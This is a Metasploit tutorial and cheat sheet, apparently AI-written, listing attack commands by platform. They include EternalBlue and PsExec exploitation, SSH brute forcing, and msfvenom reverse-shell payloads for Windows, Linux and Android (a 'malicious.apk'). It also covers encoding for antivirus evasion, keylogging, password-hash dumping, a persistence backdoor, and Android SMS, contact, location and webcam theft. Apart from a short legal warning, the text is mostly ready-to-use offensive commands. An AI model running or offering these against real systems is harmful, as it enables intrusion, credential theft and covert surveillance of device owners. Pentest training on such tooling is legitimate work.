Metasploit Framework Notes: Tutorials, Commands & Examples for Different Devices
Metasploit Framework Notes: Tutorials, Commands & Examples for Different Devices
Metasploit (MSF) is an open-source penetration testing framework used for developing, testing, and executing exploits. It simplifies the process of discovering and exploiting vulnerabilities.
Warning: Use only on systems you own or have explicit permission to test. Unauthorized use is illegal.

1. Installation & Starting Metasploit
Kali Linux (recommended):
1sudo apt update && sudo apt install metasploit-framework 2msfconsole
Update Database:
1msfdb init 2msfconsole -q
Basic Commands (msfconsole):
helpor?— Show helpsearch [keyword]— e.g.,search eternalblueorsearch type:exploit platform:windowsuse [module_path]— Load moduleshow options— View required settingsset [OPTION] [value]— e.g.,set RHOSTS 192.168.1.100show payloads/set PAYLOAD [payload]exploitorrun— Executesessions -l— List sessionssessions -i 1— Interact with session 1background— Background current sessioninfo— Module details
2. Key Module Types
- Exploits — Code that takes advantage of vulnerabilities (
exploit/). - Payloads — Code executed after successful exploit (
payloads/). - Auxiliary — Scanning, fuzzing, DoS, etc. (
auxiliary/). - Post — Post-exploitation modules (
post/). - Encoders — Evade detection.
- Nops — No-operation sleds.
Common Payloads:
windows/meterpreter/reverse_tcp— Best for Windows.linux/meterpreter/reverse_tcp— For Linux.android/meterpreter/reverse_tcp— For Android.cmd/unix/reverse— Basic shells.
3. Examples by Device / OS
Windows
EternalBlue (MS17-010) — Classic SMB exploit:
1msf6 > use exploit/windows/smb/ms17_010_eternalblue 2msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100 3msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp 4msf6 exploit(ms17_010_eternalblue) > set LHOST <your_ip> 5msf6 exploit(ms17_010_eternalblue) > exploit
PsExec (Requires credentials):
1use exploit/windows/smb/psexec 2set SMBUser administrator 3set SMBPass password 4set PAYLOAD windows/meterpreter/reverse_tcp
Meterpreter Commands (after gaining session):
sysinfogetuidshellscreenshotkeyscan_startupload / downloadmigrate— Move to stable process
Linux
vsftpd 2.3.4 Backdoor (Metasploitable example):
1use exploit/unix/ftp/vsftpd_234_backdoor 2set RHOSTS 192.168.1.101 3set PAYLOAD cmd/unix/interact 4exploit
Dirty COW or modern privilege escalation:
1search linux local privilege 2use exploit/linux/local/dirty_cow # Example
SSH brute force (auxiliary):
1use auxiliary/scanner/ssh/ssh_login 2set RHOSTS 192.168.1.0/24 3set USER_FILE users.txt 4set PASS_FILE passwords.txt 5run
Android
Generate APK Payload (msfvenom):
1msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 R > malicious.apk
Listener:
1use exploit/multi/handler 2set PAYLOAD android/meterpreter/reverse_tcp 3set LHOST <your_ip> 4set LPORT 4444 5exploit
Post-Exploitation:
dump_smsdump_contactsgeolocatewebcam_snap
Routers / Network Devices (Cisco, etc.)
Cisco IOS:
1search cisco 2use exploit/unix/misc/cisco_ios_http_exec # Example
Auxiliary Scanner:
1use auxiliary/scanner/http/cisco_device_manager
SNMP Enumeration:
1use auxiliary/scanner/snmp/snmp_enum
Web Applications / Multi-Platform
Generic HTTP Command Execution:
1use exploit/multi/http/os_cmd_exec # Newer modules available
WordPress / CMS:
1search wordpress 2# Example: WP plugin exploits
Java / Tomcat:
1use exploit/multi/http/tomcat_mgr_deploy
macOS / Apple
1search type:exploit platform:osx
4. Generating Payloads with msfvenom
1# Windows EXE 2msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > payload.exe 3 4# Linux ELF 5msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf > payload.elf 6 7# Encoded for evasion 8msfvenom -p windows/meterpreter/reverse_tcp LHOST=... -e x86/shikata_ga_nai -i 5 -f exe
List all payloads:
1msfvenom -l payloads
5. Post-Exploitation Modules
After gaining a Meterpreter session:
1run post/windows/gather/hashdump 2run post/multi/gather/smart_hashdump 3run post/linux/gather/enum_configs
Persistence:
1run persistence -U -i 5 -p 4444 -r <your_ip> # Windows
6. Best Practices & Tips
- Always update Metasploit regularly.
- Use
db_nmapto import Nmap scans:db_nmap -sV -O target. - Workspace management:
workspace -a lab1. - Resource scripts (
.rcfiles) for automation. - Evasion: Use encoders, polymorphic payloads, HTTPS reverse shells.
- Combine with Nmap from previous tutorials.
- Check targets with
checkcommand (if module supports it).
7. Common Workflows
- Recon → Nmap → Import to MSF DB.
- Vulnerability scanning (auxiliary modules).
- Exploit + Payload.
- Post-exploitation & Pivoting.
- Cleanup.
Resources:
- Official Docs: https://docs.rapid7.com/metasploit/
- Metasploit Unleashed (free course)
- NSE + Metasploit integration (use Nmap scripts to feed targets)
This covers common devices (Windows, Linux, Android, Routers, Web). Want deeper notes on a specific exploit, custom module, or evasion techniques? Or a full lab walkthrough? Let me know!
Stay ethical. Happy (legal) hacking! 🔴